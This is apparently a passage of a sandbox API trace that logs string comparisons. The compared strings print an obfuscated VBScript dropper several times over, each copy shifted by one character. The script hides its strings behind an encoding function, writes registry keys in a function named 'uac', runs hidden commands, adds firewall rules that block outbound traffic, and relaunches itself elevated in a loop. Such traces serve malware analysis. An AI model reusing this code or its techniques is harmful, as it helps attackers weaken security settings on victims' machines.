bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 61 [0222.977] wcsncmp (_String1="\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.978] wcsncmp (_String1="dim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.978] wcsncmp (_String1="im rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.978] wcsncmp (_String1="m rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.978] wcsncmp (_String1=" rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 